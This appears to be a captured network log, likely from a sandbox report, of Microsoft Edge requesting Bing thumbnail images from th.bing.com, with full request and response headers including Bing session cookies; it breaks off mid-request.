sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 5171
cache-control: public, max-age=5184000
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4355
x-check-cacheable: YES
GET

https://th.bing.com/th?q=International+French+Onion+Soup+Day+Funny&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=International+French+Onion+Soup+Day+Funny&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1729
x-check-cacheable: YES
cache-control: public, max-age=2478602
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f435f
GET

https://th.bing.com/th?q=Onjon+Chowdhury+Actor&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?q=Onjon+Chowdhury+Actor&w=138&h=138&c=7&o=5&pid=1.7&mkt=en-GB&cc=GB&setlang=en&adlt=moderate&t=1 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 5312
cache-control: public, max-age=5183981
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4344
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.30357599-0655-4c0b-82eb-a4b213c2f155&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.30357599-0655-4c0b-82eb-a4b213c2f155&w=32&h=32&qlt=93&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1949
cache-control: public, max-age=2592000
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4374
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.9d837793-b21b-4809-aceb-f60f4a0b6408&w=32&h=32&qlt=94&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.9d837793-b21b-4809-aceb-f60f4a0b6408&w=32&h=32&qlt=94&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 4649
cache-control: public, max-age=2431173
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_HIT from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4362
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OLC.8YG0jyn937vn2g480x360&w=198&h=100&c=3&rs=1&qlt=80&o=6&cdv=1&pid=Local

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OLC.8YG0jyn937vn2g480x360&w=198&h=100&c=3&rs=1&qlt=80&o=6&cdv=1&pid=Local HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1436
cache-control: public, max-age=2591984
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4373
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OLC.PijDls%2f%2fhDaYxw480x360&w=198&h=100&c=3&rs=1&qlt=80&o=6&cdv=1&pid=Local

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OLC.PijDls%2f%2fhDaYxw480x360&w=198&h=100&c=3&rs=1&qlt=80&o=6&cdv=1&pid=Local HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 3148
cache-control: public, max-age=5184000
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4343
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OLC.PqF%2b%2fxTXfAXldQ480x360&w=198&h=100&c=3&rs=1&qlt=80&o=6&cdv=1&pid=Local

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OLC.PqF%2b%2fxTXfAXldQ480x360&w=198&h=100&c=3&rs=1&qlt=80&o=6&cdv=1&pid=Local HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 5614
cache-control: public, max-age=5183989
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4352
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.e3e9db64-387f-4208-affe-04b981ca9641&w=32&h=32&qlt=95&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.e3e9db64-387f-4208-affe-04b981ca9641&w=32&h=32&qlt=95&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: SRCHUSR=DOB=20241204
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 7680
cache-control: public, max-age=5183959
date: Wed, 04 Dec 2024 10:08:14 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306894.404f4353
x-check-cacheable: YES
GET

https://th.bing.com/th?id=ODLS.c58a1b86-da17-45e2-a169-cb004181d52b&w=32&h=32&qlt=96&pcl=fffffa&o=6&pid=1.2

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=ODLS.c58a1b86-da17-45e2-a169-cb004181d52b&w=32&h=32&qlt=96&pcl=fffffa&o=6&pid=1.2 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
